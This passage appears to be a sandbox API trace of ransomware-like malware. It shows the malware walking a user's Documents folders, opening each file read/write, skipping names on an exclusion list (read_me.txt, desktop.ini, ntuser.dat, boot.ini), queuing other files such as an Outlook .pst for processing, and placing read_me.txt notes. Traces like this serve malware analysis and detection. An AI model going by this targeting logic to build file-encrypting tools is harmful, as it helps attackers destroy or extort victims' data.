StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="autorun.inf") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="ntuser.dat") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="iconcache.db") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="bootsect.bak") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="boot.ini") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="ntuser.dat.log") returned 0x0 [0076.053] StrStrW (lpFirst="_znojv_ba_jwdzqfvz.ots", lpSrch="thumbs.db") returned 0x0 [0076.053] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 92 [0076.053] QueueUserWorkItem (Function=0x404e00, Context=0x8ec, Flags=0x0) returned 1 [0076.053] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8edaa140, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x6e1ce960, ftLastAccessTime.dwHighDateTime=0x1d4d3ef, ftLastWriteTime.dwLowDateTime=0x6e1ce960, ftLastWriteTime.dwHighDateTime=0x1d4d3ef, nFileSizeHigh=0x0, nFileSizeLow=0x1059, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_znojv_ba_jwdzqfvz.ots", cAlternateFileName="_ZNOJV~1.OTS")) returned 0 [0076.053] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.054] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\l7IEr\\D n1NXFm_Av6aY4CwC\\read_me.txt") returned 97 [0076.054] GetProcessHeap () returned 0x4f10000 [0076.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.054] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 52 [0076.054] GetProcessHeap () returned 0x4f10000 [0076.054] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c10110 | out: hHeap=0x4f10000) returned 1 [0076.054] GetProcessHeap () returned 0x4f10000 [0076.054] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c10110 [0076.054] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\*") returned 69 [0076.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.054] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\.") returned 69 [0076.054] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e5db7d0, ftCreationTime.dwHighDateTime=0x1d4d099, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.054] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\..") returned 70 [0076.054] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247fbfc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.054] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\read_me.txt") returned 79 [0076.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\pwtm6t\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0076.054] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.054] CloseHandle (hObject=0x8f0) returned 1 [0076.054] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247fbfc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.054] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.055] wnsprintfW (in: pszDest=0x8c10110, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\PwtM6T\\read_me.txt") returned 79 [0076.055] GetProcessHeap () returned 0x4f10000 [0076.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c10110 | out: hHeap=0x4f10000) returned 1 [0076.055] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 53 [0076.055] GetProcessHeap () returned 0x4f10000 [0076.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c00108 | out: hHeap=0x4f10000) returned 1 [0076.055] GetProcessHeap () returned 0x4f10000 [0076.055] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.055] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0076.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247fbfc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.055] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt") returned 64 [0076.055] GetProcessHeap () returned 0x4f10000 [0076.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.055] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 54 [0076.055] GetProcessHeap () returned 0x4f10000 [0076.055] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ba00d8 | out: hHeap=0x4f10000) returned 1 [0076.057] GetProcessHeap () returned 0x4f10000 [0076.057] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.057] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0076.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247fbfc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.057] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt") returned 67 [0076.057] GetProcessHeap () returned 0x4f10000 [0076.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.058] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 55 [0076.058] GetProcessHeap () returned 0x4f10000 [0076.058] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20118 | out: hHeap=0x4f10000) returned 1 [0076.058] GetProcessHeap () returned 0x4f10000 [0076.058] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.058] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0076.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.058] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.") returned 55 [0076.058] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.058] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\..") returned 56 [0076.058] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.058] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0076.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7fc [0076.074] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.074] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.074] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.074] CloseHandle (hObject=0x7fc) returned 1 [0076.074] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0076.074] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0076.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="read_me.txt") returned 0x0 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="autoexec.bat") returned 0x0 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="desktop.ini") returned 0x0 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="autorun.inf") returned 0x0 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="ntuser.dat") returned 0x0 [0076.082] StrStrW (lpFirst="favorites.vss", lpSrch="iconcache.db") returned 0x0 [0076.083] StrStrW (lpFirst="favorites.vss", lpSrch="bootsect.bak") returned 0x0 [0076.083] StrStrW (lpFirst="favorites.vss", lpSrch="boot.ini") returned 0x0 [0076.083] StrStrW (lpFirst="favorites.vss", lpSrch="ntuser.dat.log") returned 0x0 [0076.083] StrStrW (lpFirst="favorites.vss", lpSrch="thumbs.db") returned 0x0 [0076.083] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 94 [0076.083] QueueUserWorkItem (Function=0x404e00, Context=0x7a8, Flags=0x0) returned 1 [0076.083] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.083] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt") returned 65 [0076.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0076.083] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.083] CloseHandle (hObject=0x8f4) returned 1 [0076.083] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0076.083] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned 62 [0076.083] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0076.083] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.083] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\read_me.txt") returned 65 [0076.083] GetProcessHeap () returned 0x4f10000 [0076.083] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.083] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 57 [0076.083] GetProcessHeap () returned 0x4f10000 [0076.083] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c30120 | out: hHeap=0x4f10000) returned 1 [0076.083] GetProcessHeap () returned 0x4f10000 [0076.083] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.083] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0076.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt") returned 65 [0076.084] GetProcessHeap () returned 0x4f10000 [0076.084] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0076.084] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 58 [0076.084] GetProcessHeap () returned 0x4f10000 [0076.084] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c40128 | out: hHeap=0x4f10000) returned 1 [0076.084] GetProcessHeap () returned 0x4f10000 [0076.084] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0076.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\.") returned 59 [0076.084] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\..") returned 60 [0076.084] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt") returned 69 [0076.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0076.084] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.084] CloseHandle (hObject=0x8f4) returned 1 [0076.084] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0076.084] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0076.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="read_me.txt") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="autoexec.bat") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="desktop.ini") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="autorun.inf") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="ntuser.dat") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="iconcache.db") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="bootsect.bak") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="boot.ini") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="ntuser.dat.log") returned 0x0 [0076.085] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="thumbs.db") returned 0x0 [0076.085] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 95 [0076.085] QueueUserWorkItem (Function=0x404e00, Context=0x8f4, Flags=0x0) returned 1 [0076.085] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | 